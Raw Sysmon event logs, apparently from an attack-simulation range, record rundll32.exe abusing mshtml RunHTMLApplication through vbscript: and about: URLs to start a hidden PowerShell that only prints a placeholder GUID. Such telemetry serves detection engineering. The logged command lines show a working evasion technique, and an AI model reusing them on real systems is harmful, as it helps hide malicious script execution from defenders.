15:59:37.038{7901BC46-5369-6008-6A06-00000000A301}62047500C:\Windows\system32\conhost.exe{7901BC46-5369-6008-6906-00000000A301}5376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026476Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.022{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5369-6008-6A06-00000000A301}6204C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026475Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.022{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026474Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.022{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026473Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.022{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026472Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.022{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5369-6008-6906-00000000A301}5376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026471Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.022{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026470Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.022{7901BC46-5368-6008-6806-00000000A301}32565764C:\Windows\System32\rundll32.exe{7901BC46-5369-6008-6906-00000000A301}5376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+8d00c|C:\Windows\System32\shell32.dll+114fd7|C:\Windows\System32\shell32.dll+114f35|C:\Windows\System32\wshom.ocx+c10d|C:\Windows\System32\wshom.ocx+be11|C:\Windows\System32\OLEAUT32.dll+2306f|C:\Windows\System32\OLEAUT32.dll+c2e5|C:\Windows\System32\OLEAUT32.dll+c836|C:\Windows\System32\OLEAUT32.dll+ce27|C:\Windows\System32\OLEAUT32.dll+ce27 154100x800000000000000026469Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:37.032{7901BC46-5369-6008-6906-00000000A301}5376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" vbscript:"\..\mshtml,RunHTMLApplication "+String(Close(CreateObject("Wscript.Shell").Run("powershell.exe%20-nop%20-Command%20Write-Host%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%20Start-Sleep%20-Seconds%202;%20exit",0,true)),0) 10341000x800000000000000026468Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.991{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026467Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.991{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026466Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.991{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026704Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.850{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026703Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.850{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026702Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.850{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026701Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.522{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536A-6008-6C06-00000000A301}4300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026700Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.522{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536A-6008-6C06-00000000A301}4300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026699Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.491{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536A-6008-6C06-00000000A301}4300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026698Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.491{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536A-6008-6C06-00000000A301}4300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000026697Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.444{7901BC46-536A-6008-6C06-00000000A301}4300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5thom4rl.3k2.ps12021-01-20 15:59:38.444 10341000x800000000000000026696Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.428{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-536A-6008-6C06-00000000A301}4300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026695Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.397{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536A-6008-6D06-00000000A301}6920C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026694Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.397{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536A-6008-6D06-00000000A301}6920C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026693Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.381{7901BC46-536A-6008-6D06-00000000A301}69205188C:\Windows\system32\conhost.exe{7901BC46-536A-6008-6C06-00000000A301}4300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026692Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.381{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-536A-6008-6D06-00000000A301}6920C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026691Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.381{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026690Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.381{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026689Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.381{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026688Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.381{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026687Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.381{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-536A-6008-6C06-00000000A301}4300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026686Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.381{7901BC46-536A-6008-6B06-00000000A301}52447260C:\Windows\System32\rundll32.exe{7901BC46-536A-6008-6C06-00000000A301}4300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+8d00c|C:\Windows\System32\shell32.dll+114fd7|C:\Windows\System32\shell32.dll+114f35|C:\Windows\System32\wshom.ocx+c10d|C:\Windows\System32\wshom.ocx+be11|C:\Windows\System32\OLEAUT32.dll+2306f|C:\Windows\System32\OLEAUT32.dll+c2e5|C:\Windows\System32\OLEAUT32.dll+c836|C:\Windows\System32\OLEAUT32.dll+ce27|C:\Windows\System32\OLEAUT32.dll+ce27 154100x800000000000000026685Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.382{7901BC46-536A-6008-6C06-00000000A301}4300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" about:"\..\mshtml,RunHTMLApplication "%3Chta:application%3E%3Cscript%20language="JScript"%3Ea=new%20ActiveXObject("WScript.Shell");a.Run("powershell.exe%20-nop%20-Command%20Write-Host%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%20Start-Sleep%20-Seconds%202;%20exit",0,true);close();%3C/script%3E 